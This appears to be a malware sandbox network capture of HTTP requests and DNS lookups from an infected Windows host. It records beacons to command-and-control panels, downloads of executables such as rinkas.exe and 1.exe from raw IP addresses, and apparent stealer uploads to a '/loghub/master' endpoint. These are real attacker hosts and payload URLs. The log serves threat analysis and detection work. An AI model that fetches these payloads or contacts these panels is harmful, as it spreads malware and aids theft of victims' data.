Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://rjmjx.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 293
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Thu, 12 Oct 2023 20:47:39 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 45
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://kreewknq.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 141
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Thu, 12 Oct 2023 20:47:44 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://rvobbmqqdb.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 115
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Thu, 12 Oct 2023 20:47:44 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=91
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://fyyoren.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 213
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Thu, 12 Oct 2023 20:47:44 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=90
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://wxdfxkwrs.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 114
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Thu, 12 Oct 2023 20:47:44 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 38
Keep-Alive: timeout=5, max=89
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://ilojxguy.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 329
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Thu, 12 Oct 2023 20:47:45 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=88
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://lplmsy.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 328
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Thu, 12 Oct 2023 20:47:46 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=87
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://jggeeicy.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 173
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Thu, 12 Oct 2023 20:47:46 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=86
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://dolvw.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 141
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Thu, 12 Oct 2023 20:47:47 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=85
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://eubhv.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 236
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Thu, 12 Oct 2023 20:47:47 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=84
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://wmrcs.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 186
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Thu, 12 Oct 2023 20:47:48 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=83
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://piyjoepw.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 262
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Thu, 12 Oct 2023 20:47:48 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=82
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://qvvgxups.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 184
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Thu, 12 Oct 2023 20:47:49 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=81
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
DNS

50.23.12.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

50.23.12.20.in-addr.arpa

IN PTR

Response
POST

http://5.42.92.211/loghub/master

AppLaunch.exe

Remote address:

5.42.92.211:80

Request

POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=jQkTYxw2lD58DmWYUI8v
Content-Length: 209
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: 5.42.92.211
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 12 Oct 2023 20:47:39 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 8
Connection: keep-alive
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin
GET

http://5.42.65.80/rinkas.exe

Remote address:

5.42.65.80:80

Request

GET /rinkas.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 5.42.65.80

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 12 Oct 2023 20:47:38 GMT
Content-Type: application/octet-stream
Content-Length: 202752
Last-Modified: Thu, 12 Oct 2023 19:55:32 GMT
Connection: keep-alive
ETag: "65284f34-31800"
Accept-Ranges: bytes
DNS

211.92.42.5.in-addr.arpa

Remote address:

8.8.8.8:53

Request

211.92.42.5.in-addr.arpa

IN PTR

Response

211.92.42.5.in-addr.arpa

IN PTR

hosted-by yeezyhostnet
DNS

80.65.42.5.in-addr.arpa

Remote address:

8.8.8.8:53

Request

80.65.42.5.in-addr.arpa

IN PTR

Response
DNS

206.23.85.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

206.23.85.13.in-addr.arpa

IN PTR

Response
GET

http://185.216.70.222/trafico.exe

Remote address:

185.216.70.222:80

Request

GET /trafico.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 185.216.70.222

Response

HTTP/1.1 200 OK

Date: Thu, 12 Oct 2023 20:47:39 GMT
Server: Apache/2.4.29 (Ubuntu)
Last-Modified: Thu, 12 Oct 2023 16:52:11 GMT
ETag: "6ea00-60787c2df0daa"
Accept-Ranges: bytes
Content-Length: 453120
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
DNS

222.70.216.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

222.70.216.185.in-addr.arpa

IN PTR

Response
DNS

254.3.248.8.in-addr.arpa

Remote address:

8.8.8.8:53

Request

254.3.248.8.in-addr.arpa

IN PTR

Response
GET

http://171.22.28.213/1.exe

Remote address:

171.22.28.213:80

Request

GET /1.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 171.22.28.213

Response

HTTP/1.1 200 OK

Date: Thu, 12 Oct 2023 20:47:45 GMT
Server: Apache/2.4.29 (Ubuntu)
Last-Modified: Tue, 10 Oct 2023 14:07:59 GMT
ETag: "108400-6075d3bf04880"
Accept-Ranges: bytes
Content-Length: 1082368
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
DNS

213.28.22.171.in-addr.arpa

Remote address:

8.8.8.8:53

Request

213.28.22.171.in-addr.arpa

IN PTR

Response
DNS

accounts.google.com

msedge.exe

Remote address:

8.8.8.8:53

Request

accounts.google.com

IN A

Response

accounts.google.com

IN A

142.250.179.141
GET

https://accounts.google.com/

msedge.exe

Remote address:

142.250.179.141:443

Request

GET / HTTP/2.0
host: accounts.google.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
dnt: 1
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
GET

https://accounts.google.com/ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F

msedge.exe

Remote address:

142.250.179.141:443

Request

GET /ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F HTTP/2.0
host: accounts.google.com
dnt: 1
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: __Host-GAPS=1:qSPyXtNQchiwXDs85Hu9kb4IOuRV6A:JVypf9qyQTMdUU5Z
GET

https://accounts.google.com/InteractiveLogin?continue=https://accounts.google.com/&followup=https://accounts.google.com/&passive=1209600&ifkv=AYZoVhcK3fL3PuBZwnRtldzJbqu6VIgUGaY9vhD_m5KY7Y6LEnl2nO7S-BM-P9Rx8fVz0FzqcT4l8Q

msedge.exe

Remote address:

142.250.179.141:443

Request

GET /InteractiveLogin?continue=https://accounts.google.com/&followup=https://accounts.google.com/&passive=1209600&ifkv=AYZoVhcK3fL3PuBZwnRtldzJbqu6VIgUGaY9vhD_m5KY7Y6LEnl2nO7S-BM-P9Rx8fVz0FzqcT4l8Q HTTP/2.0
host: accounts.google.com
dnt: 1
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-arch: "x86"
sec-ch-ua-platform: "Windows"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model: ""
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: __Host-GAPS=1:qSPyXtNQchiwXDs85Hu9kb4IOuRV6A:JVypf9qyQTMdUU5Z
DNS

www.facebook.com

msedge.exe

Remote address:

8.8.8.8:53

Request

www.facebook.com

IN A

Response

www.facebook.com

IN CNAME

star-mini.c10r.facebook.com

star-mini.c10r.facebook.com

IN A

157.240.201.35
DNS

208.194.73.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

208.194.73.20.in-addr.arpa

IN PTR

Response
DNS

141.179.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

141.179.250.142.in-addr.arpa

IN PTR

Response

141.179.250.142.in-addr.arpa

IN PTR

ams17s10-in-f131e100net
DNS

35.201.240.157.in-addr.arpa

Remote address:

8.8.8.8:53

Request

35.201.240.157.in-addr.arpa

IN PTR

Response

35.201.240.157.in-addr.arpa

IN PTR

edge-star-mini-shv-01-ams4facebookcom
DNS

static.xx.fbcdn.net

msedge.exe

Remote address:

8.8.8.8:53

Request

static.xx.fbcdn.net

IN A

Response

static.xx.fbcdn.net

IN CNAME

scontent.xx.fbcdn.net

scontent.xx.fbcdn.net

IN A

157.240.221.16
DNS

16.221.240.157.in-addr.arpa

Remote address:

8.8.8.8:53

Request

16.221.240.157.in-addr.arpa

IN PTR

Response

16.221.240.157.in-addr.arpa

IN PTR

xx-fbcdn-shv-01-lhr8fbcdnnet
DNS

facebook.com

msedge.exe

Remote address:

8.8.8.8:53

Request

facebook.com

IN A

Response

facebook.com

IN A

157.240.221.35
DNS

fbcdn.net

msedge.exe

Remote address:

8.8.8.8:53

Request

fbcdn.net

IN A

Response

fbcdn.net

IN A

157.240.221.35
DNS

35.221.240.157.in-addr.arpa

Remote address:

8.8.8.8:53

Request

35.221.240.157.in-addr.arpa

IN PTR

Response

35.221.240.157.in-addr.arpa

IN PTR

edge-star-mini-shv-01-lhr8facebookcom
DNS

fbsbx.com

msedge.exe

Remote address:

8.8.8.8:53

Request

fbsbx.com

IN A

Response

fbsbx.com

IN A

157.240.221.35
DNS

2.136.104.51.in-addr.arpa

Remote address:

8.8.8.8:53

Request

2.136.104.51.in-addr.arpa

IN PTR

Response
POST

http://77.91.124.1/theme/index.php

explothe.exe

Remote address:

77.91.124.1:80

Request

POST /theme/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 77.91.124.1
Content-Length: 89
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 12 Oct 2023 20:47:53 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 6
Content-Type: text/html; charset=UTF-8
DNS

195.179.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

195.179.250.142.in-addr.arpa

IN PTR

Response

195.179.250.142.in-addr.arpa

IN PTR

ams15s42-in-f31e100net
DNS

1.124.91.77.in-addr.arpa

Remote address:

8.8.8.8:53

Request

1.124.91.77.in-addr.arpa

IN PTR

Response

1.124.91.77.in-addr.arpa

IN PTR
POST

http://5.42.65.80/8bmeVwqx/index.php

oneetx.exe

Remote address:

5.42.65.80:80

Request

POST /8bmeVwqx/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.65.80
Content-Length: 89
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 12 Oct 2023 20:47:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
DNS

131.179.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

131.179.250.142.in-addr.arpa

IN PTR

Response

131.179.250.142.in-addr.arpa

IN PTR

ams17s10-in-f31e100net
DNS

learn.microsoft.com

msedge.exe

Remote address:

8.8.8.8:53

Request

learn.microsoft.com

IN A

Response

learn.microsoft.com

IN CNAME

learn-public.trafficmanager.net

learn-public.trafficmanager.net

IN CNAME

learn.microsoft.com.edgekey.net

learn.microsoft.com.edgekey.net

IN CNAME

learn.microsoft.com.edgekey.net.globalredir.akadns.net

learn.microsoft.com.edgekey.net.globalredir.akadns.net

IN CNAME

e13636.dscb.akamaiedge.net

e13636.dscb.akamaiedge.net

IN A

104.85.2.139
DNS

learn.microsoft.com

msedge.exe

Remote address:

8.8.8.8:53

Request

learn.microsoft.com

IN A

Response

learn.microsoft.com

IN CNAME

learn-public.trafficmanager.net

learn-public.trafficmanager.net

IN CNAME

learn.microsoft.com.edgekey.net

learn.microsoft.com.edgekey.net

IN CNAME

learn.microsoft.com.edgekey.net.globalredir.akadns.net

learn.microsoft.com.edgekey.net.globalredir.akadns.net

IN CNAME

e13636.dscb.akamaiedge.net

e13636.dscb.akamaiedge.net

IN A

104.85.2.139
DNS

59.82.57.23.in-addr.arpa

Remote address:

8.8.8.8:53

Request

59.82.57.23.in-addr.arpa

IN PTR

Response

59.82.57.23.in-addr.arpa

IN PTR

a23-57-82-59deploystaticakamaitechnologiescom
GET

https://learn.microsoft.com/dotnet/framework/install/application-not-started?version=(null)&processName=372F.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0

msedge.exe

Remote address:

104.85.2.139:443

Request

GET /dotnet/framework/install/application-not-started?version=(null)&processName=372F.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 HTTP/2.0
host: learn.microsoft.com
dnt: 1
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 301

location: /en-us/dotnet/framework/install/application-not-started?version=(null)&processName=372F.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
x-datacenter: eus
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-ua-compatible: IE=edge
x-xss-protection: 1; mode=block
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 0nlsoZQAAAAArOFFf8yO6TZchGwEoMiZDQlJVMzBFREdFMTAyMAA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
content-length: 0
cache-control: no-cache, no-store
expires: Thu, 12 Oct 2023 20:48:30 GMT
date: Thu, 12 Oct 2023 20:48:30 GMT
akamai-cache-status: Miss from child, Miss from parent
strict-transport-security: max-age=31536000; includeSubDomains; preload
GET

https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=372F.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0

msedge.exe

Remote address:

104.85.2.139:443

Request

GET /en-us/dotnet/framework/install/application-not-started?version=(null)&processName=372F.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 HTTP/2.0
host: learn.microsoft.com
dnt: 1
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 301

location: /en-us/dotnet/framework/install/application-not-started?version=(null)&processName=372F.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
x-datacenter: eus
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-ua-compatible: IE=edge
x-xss-protection: 1; mode=block
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 0nlsoZQAAAAAVr3JIgcWgTarK1Db+YMrgQlJVMzBFREdFMDQxMgA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
content-length: 0
cache-control: no-cache, no-store
expires: Thu, 12 Oct 2023 20:48:30 GMT
date: Thu, 12 Oct 2023 20:48:30 GMT
akamai-cache-status: Miss from child, Miss from parent
strict-transport-security: max-age=31536000; includeSubDomains; preload
GET

https://learn.microsoft.com/dotnet/framework/install/application-not-started?version=(null)&processName=372F.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0

msedge.exe

Remote address:

104.85.2.139:443

Request

GET /dotnet/framework/install/application-not-started?version=(null)&processName=372F.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 HTTP/2.0
host: learn.microsoft.com
dnt: 1
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-type: text/html
content-encoding: gzip
etag: "w2dmPny5rf4TWT8Z8/EljCyVLv1Uf/zPWlMpbkbsUe8="
vary: Accept-Encoding
request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
x-datacenter: eus
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-ua-compatible: IE=edge
x-xss-protection: 1; mode=block
x-rendering-stack: Dynamic
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 0nlsoZQAAAADPuVaQFNmMSK8WqWOzl03yQlJVMzBFREdFMTAyMAA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
content-length: 12551
cache-control: public, max-age=600
expires: Thu, 12 Oct 2023 20:58:30 GMT
date: Thu, 12 Oct 2023 20:48:30 GMT
akamai-cache-status: Miss from child, Miss from parent
strict-transport-security: max-age=31536000; includeSubDomains; preload
GET

https://learn.microsoft.com/_themes/docs.theme/master/en-us/_themes/styles/fe274a7f.site-ltr.css

msedge.exe

Remote address:

104.85.2.139:443

Request

GET /_themes/docs.theme/master/en-us/_themes/styles/fe274a7f.site-ltr.css HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/css,*/*;q=0.1
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=372F.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 68087
content-type: text/css
content-encoding: gzip
last-modified: Thu, 12 Oct 2023 02:15:52 GMT
etag: "0x8DBCAC928F64F5F"
request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
x-datacenter: eus
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-ua-compatible: IE=edge
x-xss-protection: 1; mode=block
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 0h1cnZQAAAACy+6jKLcrSQby7F8wTmDtCQlJVMzBFREdFMDcwOQA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
vary: Accept-Encoding
cache-control: public, max-age=538199
expires: Thu, 19 Oct 2023 02:18:31 GMT
date: Thu, 12 Oct 2023 20:48:32 GMT
akamai-cache-status: Hit from child
strict-transport-security: max-age=31536000; includeSubDomains; preload
GET

https://learn.microsoft.com/static/third-party/adobe-target/at-js/2.9.0/at.js

msedge.exe

Remote address:

104.85.2.139:443

Request

GET /static/third-party/adobe-target/at-js/2.9.0/at.js HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://learn.microsoft.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=372F.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-type: application/javascript
content-encoding: gzip
content-md5: p2plPaqhNrF9OruIDBWWBg==
last-modified: Thu, 30 Mar 2023 19:40:20 GMT
etag: 0x8DB315698C00FE5
x-ms-request-id: e54572c4-501e-0073-7f4e-67bf51000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}{"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
